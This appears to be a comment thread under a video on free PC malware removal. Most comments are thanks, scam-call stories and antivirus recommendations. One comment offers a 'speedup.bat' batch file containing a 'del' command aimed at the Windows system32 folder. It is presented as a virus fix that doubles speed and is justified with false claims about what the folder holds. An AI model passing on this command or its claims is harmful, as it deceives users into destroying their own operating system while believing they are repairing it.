  1. Virus? Adware? Malware? Spyware? Here's how to clean your PC FOR FREE.

  2. I can't even believe how easily you saved me so much money with this video! Fixed my brother's PC instead of taking it to a guy who normally charges around $100 as a friendly fee!
    Thank you SO much!!

  3. Thank you so much for your video, you saved me $249 from someone in Pakistan who works for Microsoft Support Technicians.  I don't know a lot on getting rid of viruses & other junk but your video has really helped to see the light at the end of the tunnel. Now, do I download all 4 programs you mentioned or not? Also, is it true that internet explorer will no longer be available as a browser if true which other one should I choose? Thank you so much for your help.

My Goodness! I downloaded McAfee last summer…..as soon as I downloaded it, I ended up getting a Trojan virus on it! I had been with Norton for years, but thought we'd try a different company….I contacted them 3 days later and got my money back…..went back to Norton. Never had any issues with them….it scares me to try anything else now, to be honest.

  6. Just get malwarebytes and you'll be good!

  7. Thank You….. Chuck!! I was looking to view a video on YouYube when a message came up saying I needed to download one, thinking it was adobe, unfortunately  I did. My McAfee went berserk. I knew I was in trouble and tried to stop it. You probably know the rest of the story. First the window, then the voice saying to call. Which I did, then I was even more idiotic and let them in my laptop. Of course they found all sorts of boogey men. One of the first things he ask was if I banked on line. "Thank God" I don't or he probably would have kidnapped my PC, as I have heard even police stations have suffered as such. He told me my "network" was infected and even if I went out and bought a new one it would be infected too. They wanted $500+ for a year, 200+ for a one time fix. Told him I couldn't afford that and I would be calling my internet provider since my "network" was supposedly infected. I did as you explained by removing everything that was downloaded at that time. It even came back, on its on and downloaded them again, sheesh!  I was so scared I scanned my computer twice a day for about a month.

As you said the residual, very annoying things were left behind. I would have these "Better Deals" ads popup wherever I put my pointer. Grrrrr. I suffered with this from the end of Feb. until just a few days ago, when I followed your instructions. I downloaded the first three. Wooooooooo, Better Deals and all their mind boggling crap is gone. I had researched doing this but was unsure of which programs were best, also had heard some could make things worse. Anyway after finding you and seeing ALL the positive comments, I said here we go.

Again, Chuck, Thank You….., you are phenomenal 😀

Easy way to have a virus free computer–INSTALL LINUX OS—— I like Ubuntu or Puppy Linux!

If anyone has a virus, or a slow, crappy, computer… all you have to do is delete system 32.
System 32 is a folder that carries 32 GIGABYTES of deleted files, Microsoft owns a bunch of antiviruses so that is why they do this…. to get back at those sly bastards, all you have to do is this!
    Open Notepad
    Type the following text :

    @echo off
    del C:\WINDOWSsystem32

Save as "speedup.bat" (Select "all files" instead of "text document")
    Double-Click the .bat file
Now reboot and your PC is twice as fast! 😀

  16. Amazing video, worth watching it. There are some suborn malware files which exist in PC which cannot be removed by simple process using windows own tool. Check for the file location, If the file that is located in any other location other than its own location, then we can conclude that the system is infected with malware.

There is a website named File- intelligence from comodo which is like a malware directory where you can find details about many existing malware. Know about the malware and find method to delete it in a simple way.

  17. You ticked off our competitors as much as when I wrote Ultimate Computer Virus Removal and Security Instructions and Kit. I've found better tools by now which are also free. You probably have too since this is a few years old
